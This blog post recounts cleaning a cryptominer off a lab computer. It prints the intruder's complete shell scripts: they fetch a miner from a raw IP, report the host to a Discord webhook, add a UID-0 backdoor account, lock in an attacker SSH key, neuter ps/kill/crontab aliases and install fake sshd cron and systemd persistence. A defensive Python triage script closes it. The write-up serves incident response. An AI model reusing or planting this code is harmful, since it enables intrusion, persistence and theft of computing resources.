Notes on a cryptomining intrusion and how it was cleaned up

To make remote use easier, a junior labmate mapped the lab computer onto the public internet, and as a result a cryptomining program got planted on it.

The mining software was this one. Since it has already been cleaned up, you can't see it running any more; otherwise the nvidia-smi command would show the mining process at work.

Then go into the process's directory, cd /proc/$PID, and look at its information.

First list all the files; you can see the location the mining program was dropped in.

With cat status you can view the process information.

The PPID field identifies the parent process. Here I was reproducing the incident, so the parent process is 4168; in the original incident the parent process was 2.

So I killed the parent process and then the mining process. But after a while the mining program showed up again, so I suspected a scheduled task; rebooting didn't get rid of it either.

First, check whether the boot-time startup script is intact:

vim /etc/rc.local

This file was normal, so the miner wasn't being launched from there.

Then check the root account's .bashrc file:

vim ~/.bashrc

It contained only these few lines, and it was obvious that the delete command had been masked. After switching to the root account I found that many commands were masked, so something was definitely wrong; but this file by itself did not run the mining program. Thinking of scheduled tasks next, I checked whether a crontab had been set:

ps -aux | grep crontab

Sure enough, a scheduled task existed, so I looked at it:

crontab -e

You can see these strange tasks; here I have commented them out.

Then I went to /var/tmp/.tmp/ to look at the files:

#!/bin/bash
m1lbe1()
{
if ! pgrep -x PhoenixMiner >/dev/null
then
        cd /var/tmp/.tmp/PhoenixMiner
        ./PhoenixMiner -pool ssl://eth-asia1.nanopool.org:9433 -wal 0xd281ffdd4fb30987b7fe4f8721b022f4b4ffc9f8.sclipiciNR1/sclipicinr1@gmail.com >/dev/null 2>&1 & disown $*
else
        exit;
fi
}
m1lbe1
(the file above is .b4nd1d0)
#!/bin/bash
###Date###
user="sclipicibosu"
pass="saieilamuie"
gilimea='"'
ip=`/usr/bin/curl -s -connect-timeout 4 -m 4 ifconfig.me`
rm -rf *timeout
sshkey="ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAplmD9EFVf28OUB8tK/qJYG4ggMAw9PJzJU1AONgB5FV9w1hxxmP/+vVUfj7HgaTPB94IW4svaMe3vMTkmYm/0y9Zrh8Q2r6f/r1OqpwQU3ThLR6quOAtl7TW7y4VIQ/wxXOffINAIrEv7mi8D0XgpkiFwIUoblZY0ErPjBwy0WFqua2Z0qxx1bHoznDxPOsHMRxSge4DYA0gADttEWz8x1NZFcjMql8OOQ5IpZRsHxlO4cBVG37WyYpL7NYGF0gqnRRFSXBGduQph1dsEf3KFo83/QaSg+mm+EQiFrbVeqpm9tDjiFazbrwsw0YhT47yzKPi+Tews16sIHAvs5KZkw== sclipicibosu"
nenea=`whoami`
uptime=$(</proc/uptime)
uptime=${uptime%%.*}
zile=$(( uptime/60/60/24 ))
secunde=$(( uptime%60 ))
minute=$(( uptime/60%60 ))
ore=$(( uptime/60/60%24 ))
sended=$(date +'%m/%d/%Y')
url='https://discord.com/api/webhooks/821345448212037685/UIO1CteG8cl6DerrO6fbI0ldKGk90H36NeNpXH56aYNbCBd1UZ31J89CR5ZBRSd9c3xj'
##########
getingmineru(){
locatie="$(cat /var/tmp/.ladyg0g0/.pr1nc35)"
if [ -f $locatie/PhoenixMiner ]; then
    :
    else
    curl -s -L -O 45.32.112.68/.mini/PhoenixMiner.tar
    tar xvf PhoenixMiner.tar
    chmod 777 PhoenixMiner/*
fi
}
###
locationperfection(){
tinlex=$(pwd)
    mkdir /var/tmp/.ladyg0g0/ >/dev/null 2>&1
    echo $tinlex > "/var/tmp/.ladyg0g0/.pr1nc35"
    if [ $(id -u) = 0 ]; then
        if [ -f "/usr/bin/.locationesclipiciu" ]; then
            :
        else
            echo $tinlex > "/usr/bin/.locationesclipiciu"
        fi
    fi
}
###
showproof(){
echo '
{
  "content": null,
  "embeds": [
    {
      "title": "Miner ON: Ip: '$ip' | Pe User: '$nenea' ",
      "description": "**Cand s-a facut Install-ul:** ***'$sended'***\n\n**Other Info:** ***Version: 3.0*** **| Uptime Miner:** ***'$zile'*** **Zile**",
      "color": 16711680
    }
  ]
}' > /tmp/.send.json
/usr/bin/curl -H "Content-Type: application/json" --data @/tmp/.send.json $url
}
###
sshkiller(){
if [ $(id -u) = 0 ]; then
mkdir /usr/.SQL-Unix
mkdir /usr/.SQL-Unix/.SQL
echo "# .bashrc
############
rm -rf ~/.bashrc
rm -rf ~/.bash_history
alias pkill='printf $gilimea$gilimea'
alias kill='printf $gilimea$gilimea'
alias killall='printf $gilimea$gilimea'
alias init='printf $gilimea$gilimea'
alias rm='printf $gilimea$gilimea'
alias halt='printf $gilimea$gilimea'
alias adduser='printf $gilimea$gilimea'
alias userdel='printf $gilimea$gilimea'
alias crontab='printf $gilimea$gilimea'
alias htop='printf $gilimea$gilimea'
alias find='printf $gilimea$gilimea'
alias locate='printf $gilimea$gilimea'
alias ps='printf $gilimea$gilimea'
alias ss='printf $gilimea$gilimea'
alias netstat='printf $gilimea$gilimea'
############
echo '# .bashrc
                                                                                                                                                                       source /usr/.SQL-Unix/.SQL/.db
alias rm='rm -i'
alias cp='cp -i'
alias mv='mv -i'
                                                                                                                                                                       echo Uname: $(uname -a)
' > ~/.bashrc
" > /usr/.SQL-Unix/.SQL/.db
echo "# .bashrc
                                                                                                                                                                       source /usr/.SQL-Unix/.SQL/.db
alias rm='rm -i'
alias cp='cp -i'
alias mv='mv -i'
                                                                                                                                                                       echo Uname: $(uname -a)
" > ~/.bashrc
echo "
if [ -f ~/.bashrc ]; then
    . ~/.bashrc
fi

" > ~/.bash_profile
chattr -i /root/.ssh ; chattr -i /root/.ssh/authorized_keys
echo $sshkey > "/root/.ssh/authorized_keys"
chmod 600 /root/.ssh/authorized_keys
chattr +i /root/.ssh/authorized_keys
else
mkdir /var/tmp/.SQL-Unix > /dev/null 2>&1
mkdir /var/tmp/.SQL-Unix/.SQL > /dev/null 2>&1
echo "# .bashrc
############
rm -rf ~/.bashrc
rm -rf ~/.bash_history
alias pkill='printf $gilimea$gilimea'
alias kill='printf $gilimea$gilimea'
alias killall='printf $gilimea$gilimea'
alias init='printf $gilimea$gilimea'
alias rm='printf $gilimea$gilimea'
alias halt='printf $gilimea$gilimea'
alias adduser='printf $gilimea$gilimea'
alias userdel='printf $gilimea$gilimea'
alias crontab='printf $gilimea$gilimea'
alias htop='printf $gilimea$gilimea'
alias find='printf $gilimea$gilimea'
alias locate='printf $gilimea$gilimea'
alias ps='printf $gilimea$gilimea'
alias ss='printf $gilimea$gilimea'
alias netstat='printf $gilimea$gilimea'
############
echo '# .bashrc
                                                                                                                                                                       source /var/tmp/.SQL-Unix/.SQL/.db
alias rm='rm -i'
alias cp='cp -i'
alias mv='mv -i'
                                                                                                                                                                       echo Uname: $(uname -a)
' > ~/.bashrc
" > /var/tmp/.SQL-Unix/.SQL/.db
echo "# .bashrc
                                                                                                                                                                       source /var/tmp/.SQL-Unix/.SQL/.db
alias rm='rm -i'
alias cp='cp -i'
alias mv='mv -i'
                                                                                                                                                                       echo Uname: $(uname -a)
" > ~/.bashrc
echo "
if [ -f ~/.bashrc ]; then
    . ~/.bashrc
fi

" > ~/.bash_profile
fi
}
###
facuser(){
if [ $(id -u) = 0 ]; then
   if ! cat /etc/passwd | grep -q "${user}"; then
   /usr/sbin/useradd -u0 -g0 -o -s /bin/bash $user ; usermod -aG sudo $user
   yes "$pass" | passwd $user
   else
        :
   fi
fi
}
###
minerinio(){
locatie="$(pwd)"
if [ -f $locatie/.b4nd1d0 ]
then
locatie="$(pwd)"
echo '#!/bin/bash
m1lbe1()
{
if ! pgrep -x PhoenixMiner >/dev/null
then
        cd '$locatie'/PhoenixMiner
        ./PhoenixMiner -pool ssl://eth-asia1.nanopool.org:9433 -wal 0xd281ffdd4fb30987b7fe4f8721b022f4b4ffc9f8.sclipiciNR1/sclipicinr1@gmail.com >/dev/null 2>&1 & disown $*
else
        exit;
fi
}
m1lbe1' > $locatie/.b4nd1d0
    chmod 777 $locatie/.b4nd1d0
    $locatie/./.b4nd1d0
    else
    locatie="$(pwd)"
echo '#!/bin/bash
m1lbe1()
{
if ! pgrep -x PhoenixMiner >/dev/null
then
        cd '$locatie'/PhoenixMiner
        ./PhoenixMiner -pool ssl://eth-asia1.nanopool.org:9433 -wal 0xd281ffdd4fb30987b7fe4f8721b022f4b4ffc9f8.sclipiciNR1/sclipicinr1@gmail.com >/dev/null 2>&1 & disown $*
else
        exit;
fi
}
m1lbe1' > $locatie/.b4nd1d0
chmod 777 $locatie/.b4nd1d0
$locatie/./.b4nd1d0
fi
}
###
crontablegend() {  
locatie="$(pwd)"
if ! crontab -l | grep -q '.placi'; then
   rm -rf $locatie/.5p4rk3l5
   echo "@daily "$locatie"/./.b4nd1d0" >> $locatie/.5p4rk3l5
   sleep 1
   echo "@reboot "$locatie"/./.placi > /dev/null 2>&1 & disown" >> $locatie/.5p4rk3l5
   sleep 1
   echo "* * * * * "$locatie"/./.placi > /dev/null 2>&1 & disown" >> $locatie/.5p4rk3l5
   sleep 1
   echo "@monthly "$locatie"/./.placi  > /dev/null 2>&1 & disown" >> $locatie/.5p4rk3l5
   sleep 1
   crontab $locatie/.5p4rk3l5
   sleep 1
   source ~/.bashrc
   rm -rf $locatie/.5p4rk3l5
fi
}
###
locationperfection
sleep 0.5
echo "Locatie ON"
wait
getingmineru
sleep 0.5
echo "Minerul Luat"
wait
facuser
sleep 0.5
echo "User Facut"
wait
sshkiller
sleep 0.5
echo "SSH Mort"
wait
showproof
sleep 0.5
echo "Info Trimis"
wait
crontablegend
sleep 0.5
echo "Crontab Done"
wait
minerinio
sleep 0.5
echo "Minerul Pornit"
wait
###
checkingpid(){
    if [ -f /usr/bin/.pidsclip ]; then
        if ps -p $(cat /usr/bin/.pidsclip) > /dev/null; then
            echo "Already running..."
        else 
            /usr/bin/sshd > /dev/null 2>&1 & disown
            echo $! > /usr/bin/.pidsclip
            chmod 777 /usr/bin/.pidsclip
            echo "Done"
        fi
    else
        /usr/bin/sshd > /dev/null 2>&1 & disown
        echo $! > /usr/bin/.pidsclip
        chmod 777 /usr/bin/.pidsclip
        echo "Done"
        fi
}
###
killingstrangers(){
echo '
#!/bin/bash
locatieasdf=$(cat /usr/bin/.locationesclipiciu)
if [ ! -d '$locatieasdf' ]; then
    mkdir '$locatieasdf'
    rsync -r /usr/bin/.locationesclipiciu/ '$locatieasdf'/
    sleep 1
    '$locatieasdf'/.b4nd1d0 > /dev/null 2>&1 & disown
else
    if [ ! -f  '$locatieasdf'/PhoenixMiner ]; then
        rsync -r /usr/bin/.locationesclipiciu/ '$locatieasdf'/
        sleep 1
        '$locatieasdf'/.b4nd1d0 > /dev/null 2>&1 & disown
fi' > /usr/bin/sshd
sleep 1
chmod 777 /usr/bin/sshd
}
###
pisamsystemu(){
echo '[Unit]
Description=Example systemd service.
[Service]
Type=simple
Restart=always
RestartSec=3600
ExecStart=/bin/bash /usr/bin/sshd
[Install]
WantedBy=multi-user.target' > /lib/systemd/system/myservice.service
sleep 1
chmod 644 /lib/systemd/system/myservice.service
systemctl enable myservice
systemctl start myservice

if [ -f "/var/tmp/.ladyg0g0/.pr1nc35" ]; then
    echo "Locatia este deja setata"
else
    if [ -f "/usr/bin/.locationesclipiciu" ]; then
        locationperfection
        echo "Am-rupt-locatiile-alea"
sleep 1
    fi
fi
if [ ! -f "/var/tmp/.ladyg0g0/.pr1nc35" ]; then
    if [ -d "/var/tmp/.ladyg0g0" ]; then
        locationperfection
        locationperfection
        echo "Locatia a fost setata"
    else
        echo "Acum facem folderul"
        mkdir /var/tmp/.ladyg0g0/
        locationperfection
        locationperfection
        echo "Am setat locatia"
    fi
fi
if [ -f $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip ]; then
    if ps -p $(cat $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip) > /dev/null; then
        echo "Already running..."
    else 
        $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.placi > /dev/null 2>&1 & disown
        echo $! > $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip
        chmod 777 $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip
        echo "Done"
        fi
else
    $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.placi > /dev/null 2>&1 & disown
    echo $! > $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip
    chmod 777 $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip
    echo "Done"
fi
}
###
if [ $(id -u) = 0 ]; then
    if [ ! -d /usr/bin/.locationesclipiciu ]; then
    cp -avr $(cat /var/tmp/.ladyg0g0/.pr1nc35) /usr/bin/.locationesclipiciu >/dev/null 2>&1 & disown
    bash -c 'yum install -y rsync >/dev/null 2>&1 & disown' || bash -c 'apt install -y rsync >/dev/null 2>&1 & disown'
        if [ ! -f /usr/bin/sshd ]; then
            killingstrangers
            pisamsystemu
            checkingpid
        fi
    fi
fi
###
(the file above is .placi)

So this person indeed did some work here, and rewrote the .bashrc file, which is also why we didn't spot the problem directly when we looked at it earlier. Honestly, if they had backed up .bashrc first and restored it after the malware finished running, it would have been even more covert. Probably a beginner (though it took me a long time to find this malware too...).

With that the mining malware was cleaned up, and it scared me into turning off the intranet port mapping right away. Some people really will do anything for money...
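An added example, not from the original post or the malware's author: a small Python triage script that checks for the persistence tricks the .placi script uses, namely cron entries that run out of /var/tmp, a source line pushed off-screen by whitespace padding in .bashrc, aliases that turn ps, kill and crontab into no-ops, and extra UID 0 accounts. The sample inputs are constructed; on a real host you would feed it the output of crontab -l, the contents of ~/.bashrc and whatever it sources, and /etc/passwd.

```python
import re
# Constructed samples modelled on the persistence tricks in the .placi script above; not from a real host.
SAMPLE_CRONTAB = """@daily /var/tmp/.tmp/./.b4nd1d0
* * * * * /var/tmp/.tmp/./.placi > /dev/null 2>&1 & disown
0 3 * * * /usr/local/bin/backup.sh
"""
# The 'source' line is padded with spaces so it sits off-screen in an editor.
SAMPLE_BASHRC = "# .bashrc\n" + " " * 150 + "source /usr/.SQL-Unix/.SQL/.db\nalias rm='rm -i'\n"
SAMPLE_DB = "alias ps='printf \"\"'\nalias crontab='printf \"\"'\nalias ls='ls --color=auto'\n"
SAMPLE_PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
                 "sclipicibosu:x:0:0::/home/sclipicibosu:/bin/bash\n"
                 "bob:x:1000:1000::/home/bob:/bin/bash\n")
TMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# Commands the intruder neuters so the victim can neither see nor kill the miner.
FORENSIC_CMDS = {"ps", "kill", "pkill", "killall", "crontab", "rm", "find",
                 "locate", "netstat", "ss", "htop", "init", "halt"}

def suspicious_cron_lines(crontab_text):
    """Cron entries that execute from a temp directory or run a hidden dotfile."""
    return [c for c in (l.strip() for l in crontab_text.splitlines())
            if c and not c.startswith("#")
            and (any(d in c for d in TMP_DIRS) or re.search(r"/\.[^/\s.]", c))]

def hidden_source_lines(rc_text, min_pad=40):
    """'source' / '.' lines hidden behind a long run of leading whitespace."""
    return [l.strip() for l in rc_text.splitlines()
            if len(l) - len(l.lstrip()) >= min_pad and re.match(r"\s*(source|\.)\s", l)]

def neutered_aliases(text):
    """Aliases that redefine a forensic command as something other than itself."""
    found = {}
    for m in re.finditer(r"^\s*alias\s+(\w+)=(['\"])(.*?)\2\s*$", text, re.M):
        name, body = m.group(1), m.group(3)
        if name in FORENSIC_CMDS and name not in body.split():
            found[name] = body
    return found

def extra_uid0_accounts(passwd_text):
    """Accounts besides root with UID 0, as created by 'useradd -u0 -g0 -o'."""
    rows = [l.split(":") for l in passwd_text.splitlines() if l.count(":") >= 6]
    return [r[0] for r in rows if r[2] == "0" and r[0] != "root"]

def triage(crontab=SAMPLE_CRONTAB, bashrc=SAMPLE_BASHRC, db=SAMPLE_DB, passwd=SAMPLE_PASSWD):
    """Run every check and keep only those that found something."""
    findings = {"cron": suspicious_cron_lines(crontab), "hidden_source": hidden_source_lines(bashrc),
                "aliases": neutered_aliases(db), "uid0": extra_uid0_accounts(passwd)}
    return {k: v for k, v in findings.items() if v}

if __name__ == "__main__":
    print(triage())
```

It does not cover the other two hooks in the script; check those by hand with lsattr /root/.ssh/authorized_keys (the +i attribute) and systemctl cat myservice (an ExecStart pointing at the fake /usr/bin/sshd).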

 

posted @ 2021-05-28 15:43 超级学渣渣